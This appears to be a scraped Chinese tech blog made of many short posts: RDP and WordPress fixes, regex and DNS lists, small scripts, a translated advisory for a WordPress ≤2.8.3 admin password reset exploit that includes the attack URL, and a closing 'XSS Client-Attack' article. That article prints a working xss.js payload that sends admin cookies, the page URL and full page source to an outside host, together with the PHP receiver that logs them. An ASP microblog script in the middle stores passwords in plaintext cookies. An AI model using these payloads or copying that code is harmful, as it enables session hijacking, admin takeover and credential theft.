风雪居

今天遇到一个莫名问题服务器没重启之前可以远程连接 重启后连接3389就提示 远程桌面连接已断开

网上找了下资料 归纳了下解决方案

该问题可能是由于Terminal Services的设备重定向器有问题，导致连接失败。解决方法：
1. 到以下链接下载Devcom.exe工具http://download.microsoft.com/download/1/1/f/11f7dd10-272d-4cd2-896f-9ce67f3e0240/devcon.exe
2. 解压到一个目录，启动命令行模式，切换到该目录的i386目录。
3. 运行devcon -r install %windir%\inf\machine.inf root\rdpdr命令重新安装Terminal services重定向器。
4. 然后重启系统，测试是否修复错误。

如不行 再检查下 计算机服务

再通过“开始->运行->输入services.msc”，打开服务管理窗口，找到名为“Remote Desktop Help Session Manager ”和“Telnet”的服务。
     在这两个服务名称上点鼠标右键选择“启动”，将服务开启。

至此“远程桌面连接已断开”这问题应该已经解决

自从我写了一篇问候百度的李宏彦女儿的文章后，人家还是一直不辞辛苦的索引本站mp3，百度完全无视掉你的 robots.txt文件设置 即使更新了文件名 不出几天网站后台的流量统计就发现流量又飙升了很多，我也一直在研究.htaccess 文件 多次折腾 总发现 要么设置了防盗链 干脆站内的mp3都不能播放 当然这种情况只出现在纯粹代码条用 比如

<object align=middle classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=MediaPlayer width=350 height=75 >
<PARAM NAME=AUTOSTART VALUE=true >
<param name=ShowStatusBar value=-1>
<param name=Filename value=音乐地址>
<embed type=application/x-oleobject codebase=http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701 flename=mp src=”音乐地址” width=400 height=75>
</embed>
</object>

而我用Audio player这个插件调用则没问题 干脆就把站内歌曲都用这插件调用了 为什么会这样 我也不清楚

我的.htaccess 写法如下

RewriteCond %{HTTP_REFERER} !^$ [NC]
#这行是开启用户输入URL就能得到文件的代码 如果这样写上 那么mp3防盗链无法生效 站外依然可以播放
RewriteCond %{HTTP_REFERER} !tkbbs.com [NC]
RewriteCond %{HTTP_REFERER} !cersky.net [NC] #这是信任列表 可以自由添加 比如!Google.com
RewriteRule .*\.(doc|exe|psd|zip|rar|mp3|wma|wmv)$ http://blog.tkbbs.com/err.gif [L,NC]

把以上代码 插入在 </IfModule>标签之前即可 WordPress自带的.htaccess文件开始就已经打开 RewriteEngine On 重写URL功能 所以无需再次声明
#后面是注释 可删掉
至于你的主机未打开URL重写 请到网上搜索相关文章

本文介绍了如何定制不同页面侧栏显示不同的内容

这几天有点忙没法静下心来写点东西嘿嘿，用了WordPress之后我发现所有页面的侧栏都一摸一样，我到网上找了下资料，
这个博客主题的作者Neoease就有解决方法。

修改 sidebar.php文件
语法上都很通俗 采用 if、else if、else、endif。这些判断来区别每个页面显示不同内容

譬如我的侧栏友情链接我只想让他首页显示
把相应文件里的代码

<div id=”multicollinks”>
<h3>友情链接</h3>
<ul><?php wp_multicollinks(‘limit=20&orderby=rand&columns=2′); ?></ul>
<div align=”right”><a href=”http://blog.tkbbs.com/link/“>更多链接…</a></div></div>

上下添加 <?php if (is_home()) : ?>  <?php endif; ?> 改为：

<?php if (is_home()) : ?>
<div id=”multicollinks”>
<h3>友情链接</h3>
<ul><?php wp_multicollinks(‘limit=20&orderby=rand&columns=2′); ?></ul>
<div align=”right”><a href=”http://blog.tkbbs.com/link/“>更多链接…</a></div></div>
<?php endif; ?>

关键就在 is_home() （只显示在首页） is_single() （只显示文章页）这些函数的调用
例如多个判断语句
要在首页显示 Archives, 单篇文章显示 Categories, 其他页面显示 Meta, 则需要改动代码如下:

<?php if (is_home()) : ?>
 <div>
  <h3>Archives</h3>
  <ul>
   <?php wp_get_archives(); ?>
  </ul>
 </div>
<?php else if (is_single()) : ?>
 <div>
  <h3>Categories</h3>
  <ul>
   <?php wp_list_cats(); ?>
  </ul>
 </div>
<?php else : ?>
 <div>
  <h3>Meta</h3>
  <ul>
   <?php wp_register(); ?>
   <li><?php wp_loginout(); ?></li>
  </ul>
 </div>
<?php endif; ?>

如果你想更细微的调整侧栏显示内容 那么你可以参考官方提供的函数调用文档WordPress Codex – Conditional Tags

文章内容参考自：Neoease的博客

咳，刚用上没几天就出现个漏洞，不大不小，出现了却让你十分头疼。文章内容

来自
http://www.milw0rm.com/exploits/9410 我大致翻译下

=============================================
- 漏洞发布日期: 2009/08/10
- 发现者: Laurent Gaffié(他这个是什么E？)
- 严重程度: 中等(我靠 还中等 无聊的人一直重置你密码 你就甭想更新博客了)
=============================================

漏洞名称
————————-
WordPress <= 2.8.3 Remote admin reset password
WordPress 远程任意重置管理员密码 2.8.3(包括)一下版本通杀

漏洞描述

正常情况下我们必须知道用户名或者管理的电子邮件才可以重置，重置后你的邮

箱将会收到一封重置密码的连接

譬如

http://blog.tkbbs.com/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

我们来看看出现漏洞的页面源代码：

wp-login.php:
186行

function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users

WHERE user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

276行

$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = ‘resetpass’;

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’,

‘retrievepassword’, ‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false

=== has_filter(‘login_form_’ . $action) )
$action = ‘login’;

370行

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();

break;

从上你可以看出你可以滥用密码重置功能，并绕过用户名(电子邮箱地址)验证,
然后直接重设代表管理密码的$key 关键变量。

利用方法

/wp-login.php?action=rp&key[]=
管理密码将无确认直接充值成随机密码

任何浏览者都可以利用此链接重置管理员密码
WordPress 2.8.3(包括)及以下全线阵亡。。

补丁？

哦 上帝  WordPress还没出现补丁包

我这里提供我的好友 一想千开提供的办法 在此感谢
以下是他的分析：
key[] 时
PHP会认为KEY是一个数组
我们可以判断KEY是不是数组
是数组 终止执行或者提示
这样就O了
搜索wp-login.php文件
require( dirname(__FILE__) . ‘/wp-load.php’ );
下面增加
if (is_Array($_GET["key"])){
exit();
}

OK 收工

如果你不幸中招怎么办？

登陆你的phpadmin吧
输入SQL查询语句

UPDATE `你的数据库名`.`wp_users` SET `user_pass` = ‘32位的MD5加密’

WHERE `wp_users`.`ID` =1 LIMIT 1 ;

你可以到一些提供MD5在线加密的网站把你的密码加密后 在复制到查询器查询更

新。然后你就可以用你的新密码登陆了

• 测试字符串的某个模式。例如，可以对一个输入字符串进行测试，看在该字符串是否存在一个电话号码模式或一个信用卡号码模式。这称为数据有效性验证。
   
• 替换文本。可以在文档中使用一个正则表达式来标识特定文字，然后可以全部将其删除，或者替换为别的文字。
   
• 根据模式匹配从字符串中提取一个子字符串。可以用来在文本或输入字段中查找特定文字。

例如，如果需要搜索整个 web 站点来删除某些过时的材料并替换某些HTML 格式化标记，则可以使用正则表达式对每个文件进行测试，看在该文件中是否存在所要查找的材料或 HTML 格式化标记。用这个方法，就可以将受影响的文件范围缩小到包含要删除或更改的材料的那些文件。然后可以使用正则表达式来删除过时的材料，最后，可以再次使用正则表达式来查找并替换那些需要替换的标记。

另一个说明正则表达式非常有用的示例是一种其字符串处理能力还不为人所知的语言。VBScript 是 Visual Basic 的一个子集，具有丰富的字符串处理功能。与 C 类似的 Jscript 则没有这一能力。正则表达式给 JScript 的字符串处理能力带来了明显改善。不过，可能还是在 VBScript 中使用正则表达式的效率更高，它允许在单个表达式中执行多个字符串操作。

一个正则表达式就是由普通字符（例如字符 a 到 z）以及特殊字符（称为元字符）组成的文字模式。该模式描述在查找文字主体时待匹配的一个或多个字符串。正则表达式作为一个模板，将某个字符模式与所搜索的字符串进行匹配。

这里有一些可能会遇到的正则表达式示例：

下表是元字符及其在正则表达式上下文中的行为的一个完整列表：

常用正则：
1.验证用户名和密码：（ “^[a-zA-Z]\w{5,15}$ “）正确格式： “[A-Z][a-z]_[0-9] “组成,并且第一个字必须为字母6~16位；
2.验证电话号码：（ “^(\d{3.4}-)\d{7,8}$ “）正确格式：xxx/xxxx-xxxxxxx/xxxxxxxx；
3.验证身份证号（15位或18位数字）：（ “^\d{15} ¦\d{18}$ “）；
4.验证Email地址：( “^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$ “)；
5.只能输入由数字和26个英文字母组成的字符串：( “^[A-Za-z0-9]+$ “) ;
6.整数或者小数：^[0-9]+\.{0,1}[0-9]{0,2}$
7.只能输入数字： “^[0-9]*$ “。
8.只能输入n位的数字： “^\d{n}$ “。
9.只能输入至少n位的数字： “^\d{n,}$ “。
10.只能输入m~n位的数字：。 “^\d{m,n}$ ”
11.只能输入零和非零开头的数字： “^(0 ¦[1-9][0-9]*)$ “。
12.只能输入有两位小数的正实数： “^[0-9]+(.[0-9]{2})?$ “。
13.只能输入有1~3位小数的正实数： “^[0-9]+(.[0-9]{1,3})?$ “。
14.只能输入非零的正整数： “^\+?[1-9][0-9]*$ “。
15.只能输入非零的负整数： “^\-[1-9][]0-9 “*$。
16.只能输入长度为3的字符： “^.{3}$ “。
17.只能输入由26个英文字母组成的字符串： “^[A-Za-z]+$ “。
18.只能输入由26个大写英文字母组成的字符串： “^[A-Z]+$ “。
19.只能输入由26个小写英文字母组成的字符串： “^[a-z]+$ “。
20.验证是否含有^%& &apos;,;=?$\ “等字符： “[^%& &apos;,;=?$\x22]+ “。
21.只能输入汉字： “^[\u4e00-\u9fa5]{0,}$ ”
22.验证URL： “^http://([\w-]+\.)+[\w-]+(/[\w-./?%&=]*)?$ “。
23.验证一年的12个月： “^(0?[1-9] ¦1[0-2])$ “正确格式为： “01 “～ “09 “和 “1 “～ “12 “。
24.验证一个月的31天： “^((0?[1-9]) ¦((1 ¦2)[0-9]) ¦30 ¦31)$ “正确格式为； “01 “～ “09 “和 “1 “～ “31 “。
25.”^\d+$ “　　//非负整数（正整数 + 0）
26.”^[0-9]*[1-9][0-9]*$ “　　//正整数
27.”^((-\d+) ¦(0+))$ “　　//非正整数（负整数 + 0）
28.”^-[0-9]*[1-9][0-9]*$ “　　//负整数
29.”^-?\d+$ “　　　　//整数
30.”^\d+(\.\d+)?$ “　　//非负浮点数（正浮点数 + 0）
31.”^(([0-9]+\.[0-9]*[1-9][0-9]*) ¦([0-9]*[1-9][0-9]*\.[0-9]+) ¦([0-9]*[1-9][0-9]*))$ “　　//正浮点数
32.”^((-\d+(\.\d+)?) ¦(0+(\.0+)?))$ “　　//非正浮点数（负浮点数 + 0）
33.”^(-(([0-9]+\.[0-9]*[1-9][0-9]*) ¦([0-9]*[1-9][0-9]*\.[0-9]+) ¦([0-9]*[1-9][0-9]*)))$ “　　//负浮点数
34.”^(-?\d+)(\.\d+)?$ “　　//浮点数
35.”^[A-Za-z]+$ “　　//由26个英文字母组成的字符串
36.”^[A-Z]+$ “　　//由26个英文字母的大写组成的字符串
37.”^[a-z]+$ “　　//由26个英文字母的小写组成的字符串
38.”^[A-Za-z0-9]+$ “　　//由数字和26个英文字母组成的字符串
39.”^\w+$ “　　//由数字、26个英文字母或者下划线组成的字符串
40.”^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)+$ “　　　　//email地址
41.”^[a-zA-z]+://(\w+(-\w+)*)(\.(\w+(-\w+)*))*(\?\S*)?$ “　　//url
42.提取信息中的网络链接: (h ¦H)(r ¦R)(e ¦E)(f ¦F) *= *( &apos; ¦ “)?(\w ¦\\ ¦\/ ¦\.)+( &apos; ¦ ” ¦ * ¦ >)?
43.提取信息中的邮件地址: \w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*
44.提取信息中的图片链接: (s ¦S)(r ¦R)(c ¦C) *= *( &apos; ¦ “)?(\w ¦\\ ¦\/ ¦\.)+( &apos; ¦ ” ¦ * ¦ >)?
45.提取信息中的ip地址: (\d+)\.(\d+)\.(\d+)\.(\d+)
46.提取信息中的中国手机号码: (86)*0*13\d{9}
47.提取信息中的中国固定电话号码: (\(\d{3,4}\) ¦\d{3,4}- ¦\s)?\d{8}
48.提取信息中的中国电话号码（包括移动和固定电话）: (\(\d{3,4}\) ¦\d{3,4}- ¦\s)?\d{7,14}
49.提取信息中的中国邮政编码: [1-9]{1}(\d+){5}
50.提取信息中的中国身份证号码: \d{18} ¦\d{15}
51.提取信息中的整数： \d+
52.提取信息中的浮点数（即小数）：(-?\d*)\.?\d+
53.提取信息中的任何数字 ： (-?\d*)(\.\d+)?
54.提取信息中的中文字符串： [\u4e00-\u9fa5]*
55.提取信息中的双字节字符串 (汉字)：[^\x00-\xff]*
56.提取信息中的英文字符串：\w*
57.提取任意HTML标记之间的内容：<script[\s\S]+</script *>
58.高强度日期验证
     ^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29-))$
59.高强度日期+时间验证
    ^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29-)) (20|21|22|23|[0-1]?\d):[0-5]?\d:[0-5]?\d$
从上面我们可以看到: “^ “表示后面紧跟着的字符为开头;与之相对应的式 “$ “以紧跟前面的字符为结尾.但是要注意的式当 “^ “位于 “[] “里时,表示 “非 “的意思,例如:[^AZ]表示不能为 “AZ “中的任一个字符. “[] “表示当中的一个字符. “{} “可以取得一个范围,例如 “{9} “表示9个,而 “{1,9} “表示1到9个字符.
正则调试工具：
点击下载此文件
本文转载自:小鑫的Blog

DNS（Domain Name System）是域名解析服务器的意思，它在互联网的作用是把域名转换成为网络可以识别的IP地址。目前国内电信运营商通过使用DNS劫持的方法，干扰用户正常上网，使得用户无法访问Google、Gmail、Google AdSense、Google Maps等常用服务，昨天我介绍了使用OpenDNS的方法解决这个问题，由于OpenDNS的服务器在美国，如果使用的人多了有可能会速度变慢，因此今天我介绍一些其他国外的DNS服务器地址，供大家选择。

　　通常来说，香港、韩国、日本等国的DNS服务器速度会比较快，大家可以多用几个试试，尽量选择一个自己访问最快的DNS服务器，中国的电信运营商都是流氓，DNS服务器，早换早轻松。
本文DNS地址均是筛选过可以使用的地址
　　[color=Green]港澳台DNS服务器地址
　　香港：
　　205.252.144.228
　　208.151.69.65
　　202.181.202.140
　　202.181.224.2
　　澳门：
　　202.175.3.8
　　202.175.3.3
　　台湾：
　　168.95.192.1
　　168.95.1.1
　　[color=Green]国外DNS服务器地址
　　美国：
　　208.67.222.222
　　208.67.220.220
　　165.87.13.129
　　165.87.201.244
　　205.171.3.65
　　205.171.2.65
　　198.41.0.4
　　198.41.0.4
　　198.32.64.12
　　192.33.4.12
　　192.203.230.10
　　192.5.5.241
　　192.112.36.4
　　192.36.148.17
　　192.58.128.30
　　192.9.9.3
　　193.0.14.129
　　128.9.0.107
　　128.8.10.90
　　66.33.206.206.
　　208.96.10.221
　　66.33.216.216
　　205.171.3.65
　　205.171.2.65
　　165.87.13.129
　　165.87.201.244
　　加拿大：
　　209.166.160.36
　　209.166.160.132
　　英国：
　　193.0.14.129
　　日本
　　202.12.27.33
　　202.216.228.18
　　韩国：
　　164.124.101.31
　　203.248.240.31
　　168.126.63.60
　　168.126.63.61
　　新西兰：
　　202.27.184.3
　　泰国：
　　209.166.160.132
　　202.44.8.34
　　202.44.8.2
　　印度：
　　202.138.103.100
　　202.138.96.2
　　[color=Green]国内各省市DNS服务器地址
　　北京：
　　202.96.199.133
　　202.96.0.133
　　202.106.0.20
　　202.106.148.1
　　202.97.16.195
　　202.138.96.2
　　深圳：
　　202.96.134.133
　　202.96.154.15
　　广州：
　　61.144.56.100
　　61.144.56.101
　　广东：
　　202.96.128.86
　　202.96.128.143
　　上海：
　　202.96.199.132
　　202.96.199.133
　　202.96.209.5
　　202.96.209.133
　　天津：
　　202.99.96.68
　　202.99.104.68
　　广西：
　　202.96.128.68
　　202.103.224.68
　　202.103.225.68
　　河南：
　　202.102.227.68
　　202.102.245.12
　　202.102.224.68
　　河北：
　　202.99.160.68
　　福建：
　　202.101.98.54
　　202.101.98.55
　　厦门：
　　202.101.103.55
　　202.101.103.54
　　湖南：
　　202.103.0.68
　　202.103.96.68
　　202.103.96.112
　　湖北：
　　202.103.0.68
　　202.103.0.117
　　202.103.24.68
　　江苏：
　　202.102.15.162
　　202.102.29.3
　　202.102.13.141
　　202.102.24.35
　　浙江：
　　202.96.102.3
　　202.96.96.68
　　202.96.104.18
　　陕西：
　　202.100.13.11
　　202.100.4.16
　　202.100.4.15
　　202.100.0.68
　　山东：
　　202.102.154.3
　　202.102.152.3
　　202.102.128.68
　　202.102.134.68
　　山西：
　　202.99.192.68
　　202.99.198.6
　　四川：
　　202.98.96.68
　　61.139.2.69
　　重庆：
　　61.128.128.68
　　成都：
　　202.98.96.68
　　202.98.96.69
　　辽宁：
　　202.98.0.68
　　202.96.75.68
　　202.96.75.64
　　202.96.69.38
　　202.96.86.18
　　202.96.86.24
　　安徽：
　　202.102.192.68
　　202.102.199.68
　　10.89.64.5
　　吉林：
　　202.98.5.68
　　202.98.14.18
　　202.98.14.19
　　江西：
　　202.101.224.68
　　202.109.129.2
　　202.101.240.36
　　新疆：
　　61.128.97.74
　　61.128.97.73
　　贵州：
　　202.98.192.68
　　10.157.2.15
　　云南：
　　202.98.96.68
　　202.98.160.68
　　黑龙江：
　　202.97.229.133
　　202.97.224.68
　　219.150.32.132
　　海南：
　　202.100.192.68
　　202.100.199.8
　　宁夏：
　　202.100.0.68
　　202.100.96.68
　　甘肃：
　　202.100.72.13
　　内蒙古：
　　202.99.224.68
　　青海：
　　202.100.128.68
　　[color=Green]全球路由DNS服务器
PS:这里是引申资料 可别设置成这些IP 否则上不了网别来找我[微笑]
　　全球只有13台路由DNS服务器（Route Server),在13台路由服务器中，名字分别为“A”至“M”，其中10台设置在美国，另外各有一台设置于英国、瑞典和日本。下表是这些机器的管理单位、设置地点及最新的IP地址。
　　名称　　管理单位及设置地点　　　　IP地址
　　A INTERNIC.NET（美国，弗吉尼亚州） 198.41.0.4
　　B 美国信息科学研究所（美国，加利弗尼亚州） 128.9.0.107
　　C PSINet公司（美国，弗吉尼亚州） 192.33.4.12
　　D 马里兰大学（美国马里兰州） 128.8.10.90
　　E 美国航空航天管理局[NASA]（美国加利弗尼亚州） 192.203.230.10
　　F 因特网软件联盟（美国加利弗尼亚州） 192.5.5.241
　　G 美国国防部网络信息中心（美国弗吉尼亚州） 192.112.36.4
　　H 美国陆军研究所（美国马里兰州） 128.63.2.53
　　I Autonomica公司（瑞典，斯德哥尔摩） 192.36.148.17
　　J VeriSign公司（美国，弗吉尼亚州） 192.58.128.30
　　K RIPE NCC（英国，伦敦） 193.0.14.129
　　L IANA （美国，弗吉尼亚州） 198.32.64.12
本文转自：http://www.williamlong.info/archives/1842.html

现代浏览器对安全越来越重视，javascript的限制也越来越多，Flash逐渐成为新兴的交互手段，一些程序员就用flash来实现了这一功能，并且可以与javascript进行交互调用。
IE8下复制网址会提示安全设置 Firefox下复制网址则没反应 使用这段代码主要是在这些浏览器下用flash解决JavaScript安全问题。
Javascript代码片段(完整实例请参考在线演示或者压缩包文件)
[code]
[color=#006600]// 注册Client并设置相关属性
[color=#000000]
var clip = [color=#800000]new ZeroClipboard[color=#0000ff].[color=#0000a0]Client[color=#0000ff]([color=#0000ff])[color=#0000ff];
clip[color=#0000ff].setHandCursor[color=#0000ff]( [color=#0000a0]true [color=#0000ff])[color=#0000ff];
[color=#006600]// 增加复制事件
clip[color=#0000ff].addEventListener[color=#0000ff]([color=#ff00ff]'mouseOver'[color=#0000ff], [color=#800000]function[color=#0000ff](client[color=#0000ff])[color=#0000ff]{
[color=#006600]// 这里复制本页的链接地址
clip[color=#0000ff].setText[color=#0000ff]( location[color=#0000ff].href [color=#0000ff])[color=#0000ff];
[color=#0000ff]}[color=#0000ff])[color=#0000ff];
[color=#006600]// 复制成功后的事件
clip[color=#0000ff].addEventListener[color=#0000ff]([color=#ff00ff]'complete'[color=#0000ff], [color=#800000]function[color=#0000ff](client[color=#0000ff],[color=#008000]text[color=#0000ff])[color=#0000ff]{
alert[color=#0000ff]([color=#ff00ff]"复制成功"[color=#0000ff])[color=#0000ff];
[color=#0000ff]}[color=#0000ff])[color=#0000ff];
[color=#006600]// 绑定事件到页面元素
clip[color=#0000ff].glue[color=#0000ff]( [color=#ff00ff]'d_clip_button' [color=#0000ff])[color=#0000ff];
[/code]
演示地址：http://blog.tkbbs.com/code/copy.htm
代码下载： http://blog.tkbbs.com/code/copy.rar
原文地址：http://www.codigg.com/2009/06/zeroclipboard-cross-browser/

很多微博客（如嘀咕和做啥）和第三方工具（如Hellotxt、Ping.fm）都同时提供了同步到其他微博客的服务，可以同步信息到一些主要的微博客服务，如Twitter、饭否等，但是这些工具都有一个很重要的问题，就是存在密码被盗或泄漏的风险。
　　目前大多数微博客是通过用户名和密码做为参数进行认证登录，Twitter可使用OAuth协议进行认证，而这些用户名和密码存放在这些同步工具网站上，万一保存不当，就有可能会被黑客获取，带来用户帐号被盗的风险，因此，比较保险的办法是通过自己写的程序来实现微博客的自动同步功能，这样被黑客破解的可能性就小了很多。
　　这里写了一个同时更新Twitter、饭否、嘀咕和做啥等微博客的小程序，可以在自己的服务器上实现微博客同时更新功能，为了代码简单，使用时需要这几个服务使用相同的用户名和相同的密码，选中需要同步的微博客，也可勾选掉不想发布的服务，然后输入用户名和密码，发布信息后就会自动同时更新这几个微博客。
　　程序在线演示在这里： http://blog.tkbbs.com/twitter.asp
　　全部源程序代码如下：
[code]<%@ CODEPAGE=65001 %>
<%
If Request("submit")<>"" Then
Dim xmlhttp
Set xmlhttp = Server.CreateObject("Microsoft.XMLHTTP")
Response.Cookies("save_username")=Request("username")
Response.Cookies("save_username").Expires=Date+365
Response.Cookies("save_password")=Request("password")
Response.Cookies("save_password").Expires=Date+365
username = Request("username")
password = Request("password")
post_status = "status=" + server.URLencode(Request("updateStatus"))
If Request("twitter") = 1 Then
xmlhttp.Open "POST", "http://" & username & ":" & password & "@twitter.com/statuses/update.xml", False
xmlhttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"
xmlhttp.setRequestHeader "Content-Length", Len(post_status)
xmlhttp.Send (post_status)
Response.Write "twitter OK." 'xmlhttp.responseText
End If
If Request("fanfou") = 1 Then
xmlhttp.Open "POST", "http://" & username & ":" & password & "@api.fanfou.com/statuses/update.xml", False
xmlhttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"
xmlhttp.setRequestHeader "Content-Length", Len(post_status)
xmlhttp.Send (post_status)
Response.Write "fanfou OK." 'xmlhttp.responseText
End If
If Request("digu") = 1 Then
post_status = "content=" + server.URLencode(Request("updateStatus"))
xmlhttp.Open "POST", "http://" & username & ":" & password & "@api.digu.com/statuses/update.xml", False
xmlhttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"
xmlhttp.setRequestHeader "Content-Length", Len(post_status)
xmlhttp.Send (post_status)
Response.Write "digu OK." 'xmlhttp.responseText
End If
If Request("zuosa") = 1 Then
xmlhttp.Open "POST", "http://" & username & ":" & password & "@api.zuosa.com/statuses/update.xml", False
xmlhttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"
xmlhttp.setRequestHeader "Content-Length", Len(post_status)
xmlhttp.Send (post_status)
Response.Write "zuosa OK." 'xmlhttp.responseText
End If
Set xmlhttp = Nothing
response.end
Else
%>

<%
End if
%>[/code]
本文转载自：月光博客

现在流行的Twitter等微博客网站，有一个很好的用户体验，就是在文本框中输入文字的时候，会自动统计输入的字符，并显示用户还能输入的字符，在限制了140个字的微博客中，这样的小提示可以很好的增强用户体验。
　　如果实现这种技术呢，其实挺简单，几行代码就能完成输入字符统计功能，经过实际测试，其对文字的统计与Twitter等微博客的完全相同。
　　使用方法是，先增加一个span，用于显示剩余的字数，然后在Textarea中，加入一个onkeydown和onkeyup的事件，调用另一段JavaScript函数，函数调用的参数为span的id和textarea的id，然后再JavaScript中使用innerHTML返回计算出来的剩余字数。
　　以下是相关的JavaScript代码：
[code]
可以输入140字

[/code]
举一反三 那么如何限制textarea字数并实时显示输入字数统计？
代码
[code]

[/code]
本文部分来源于：月光博客

原文地址：http://www.vul.kr/xss-client-attack
文章作者：TTFCT
1、在渗透测试中，找不到后台？
2、在没有其它任何人登陆的情况下，后台的机密信息无缘无故被窃取？
3、在后台密码极其复杂且无法破解的情况下，有非管理IP登陆的痕迹？
这篇文章阐述的XSS Client-Attack主要是涉及以上三个问题。以下进行具体说明：
1、当管理后台被XSS后，XSS可将管理员当前页面发送至接收端，用location.href实现
2、当管理后台被XSS后，虽然IE GET提交有限制，但XSS可将管理员当前页源代码分段多次提交到接收端，用ajax、document.documentElement.outerHTML实现(这里一会重点讲)
3、当管理后台被XSS后，XSS将管理登陆的SESSION COOKIE发送至接收端，在后台验证不严的情况下，攻击者直接利用COOKIE登陆后台，用document.cookie实现
这里重点讲讲2，本来，直接使用document.documentElement.outerHTML就可以获得当前页源代码，为何要用AJAX？问题的原因是直接使用document.documentElement.outerHTML会出现获取源代码不全的情况。
示例1：
admin-1.html
This is source code

<script>
alert(document.documentElement.outerHTML)
</script>

how about this?
我们发现，alert出的窗口中，并没有“how about this?”，这意味着，在插入XSS代码之下的源文件都不能获取，所以，需要用到AJAX来获取全部。
另外，还有一种情况，就是对方打开的页面是保存在本地的，如：C:\Users\Administrator\Desktop\data.htm,那就得用document.documentElement.outerHTML来实现抓取了。
下面请见XSS源代码
——————————–xss.js———————————-

function sd(doc){
         send = document.createElement('script');
         send.src=server+'get.php?'+doc;
         send.type='javascript';
         head.appendChild(send);
         }
function ajax(u) {
   var xmlHttp;
   try {
     xmlHttp = new XMLHttpRequest;
   } catch (e) {
      try {
         xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
      } catch (e) {
         try {
            xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
         } catch (e) {
         }
      }
   }
    xmlHttp.open("GET",u,false);
    xmlHttp.send(null);
    return escape(xmlHttp.responseText);
}

var doc='';
var server='http://www.vul.kr/';
var head=document.getElementsByTagName('head').item(0);

url=encodeURIComponent(location.href);
ck=encodeURIComponent(document.cookie);
sd("s=1&u="+url+"&c="+ck);

if(location.href.indexOf("file:")==-1)
  doc=ajax(location.href);
else
doc=escape(document.documentElement.outerHTML);

doclen=doc.length;
buflen=2040;
for(i=0;i<doclen;i=i+buflen){
   dstr=doc.substr(i,buflen);
   sd("s=2&d="+dstr);
   }
sd("s=3");

接收端代码：
——————————–get.php———————————-

<?
$url=0;$data=0;$cookie=0;$addr=0;
$url=$_GET['u'];

if(strlen($_GET['c'])>2)$cookie=$_GET['c'];
if(strlen($_GET['d'])>2)$data=$_GET['d'];
if(strlen($_SERVER['REMOTE_ADDR'])>2)$addr=$_SERVER['REMOTE_ADDR'];

$str="<center><textarea name='textarea' cols=150 rows=30>";
$str.="\r\n\r\nURL:".$url."\r\nCookie:".$cookie."\r\nAddress:".$addr."\r\nTime:".date("Y-m-d h:i:s", time())."\r\n\r\n\r\n";
if($_GET['s']==1)w($str);

if($_GET['s']==2)w(htmlentities($data));

if($_GET['s']==3)w("</textarea></center>");

function w($d){
$a=$_SERVER['REMOTE_ADDR'];
@fwrite(@fopen("dc/".$a.".htm","a+"),stripcslashes($d));}
?>